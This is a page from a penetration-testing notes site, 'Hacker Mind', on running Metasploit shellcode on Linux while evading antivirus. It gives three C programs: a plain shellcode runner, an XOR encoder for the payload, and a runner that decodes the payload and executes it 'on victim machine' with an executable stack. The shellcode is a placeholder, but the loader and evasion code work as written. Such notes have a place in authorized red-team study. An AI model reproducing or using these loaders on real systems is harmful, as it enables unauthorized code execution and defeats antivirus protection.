🤯
Hacker Mind
  • Penetration Testing Notes
    • 00 - Kali Linux Preparation
    • Page 1
    • Web Application (80/443)
      • XSS
      • LFI / Path Traversal
      • Wordpress
    • SMB (445)
    • LDAP
    • MSRPC (135)
    • MSSQL
    • Kerberos (88/tcp)
    • DNS (53)
    • IPv6
    • Import Nessus to Metasploit
  • STUCK? Look at this :D
  • Buffer Overflow
    • WinDbg
    • BoF Script Python
  • Active Directory Recon
    • Username Generation
    • PowerView
    • BloodHound
    • Flooding Attack
  • Payload
    • Sendemail
    • Phishing Payload
    • Bypass All The Things
      • AppLocker
      • MSBuild Shell
      • C# Runner
      • Payload Mod
      • Powershell
      • Bypass AV Linux
        • C Runner
  • Exploit
    • Brute Force
    • File Upload
    • Cracking
    • Shell & Stabilization
    • Database
    • MSSQL Injection
  • Tradecraft
    • Invoke-ReflectivePEInjection
  • Metasploit
    • Meterpreter Tricks
  • Privilege Escalation
    • Lateral Movement
    • Linux
    • Windows
  • Post Exploit
    • Active Directory
      • Kerberos
      • ACLs/ACEs
      • DCSync
      • Golden Ticket with krbtgt
      • LAPS
      • Page
      • Impersonate Token
    • Pivoting
      • Pivot in a Case
    • Transfer File
    • Exfiltration
    • Persistence
  • WiFi Pentesting
    • WPA-PSK
    • WPA-E (hostapd)
    • Attack WEP
    • Evil Twin - Wi-Fi
    • WPA3 Downgrade
  • Hardware Hacking
    • Information Gathering
  • Practice & Lab
Powered by GitBook
On this page
  1. Payload
  2. Bypass All The Things
  3. Bypass AV Linux

C Runner

Run metasploit shellcode

// compile with victim machine
// gcc -o shell.out shell.c -z execstact
// run with : ./shell.out
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

unsigned char buff[] =
"...."
"...shellcode..."
"....."

int main (int argc, char **argv)
{
    // run shellcode
    int (*apple)()=(int(*)())buff;
    apple();
}

Encoder C

Encoder XOR

// compile with kali machine
// gcc -o encoder.out encoder.c
// run with : ./shell.out
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

unsigned char buff[] =
"...."
"...shellcode..."
"....."
int main (int argc, char **argv)
{
    char xorKey = 'A';
    int payloadLength = (int) sizeof(buff);
    
    for (int i=0; i<payloadLength; i++)
    {
         printf("\\x%02X", buff[i]^xorKey);   
    }
    return 0;
}

Runner XOR in C:

// compile with victim machine
// gcc -o shell.out shell.c -z execstact
// run with : ./shell.out
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

unsigned char buff[] = 
"<encoded payload>"

int main (int argc, char **argv)
{
    // run shellcode decoded from xor
    char xorKey = 'A';
    int arraysize = (int) sizeof(buff);
    for (int i=0; i<arraysize-1; i++)
    {
        buff[i] = buff[i]^xorKey;
    }
    // run decoded payload
    int (*apple)()=(int(*)())buff;
    apple();
}

PreviousBypass AV LinuxNextExploit

Last updated 6 months ago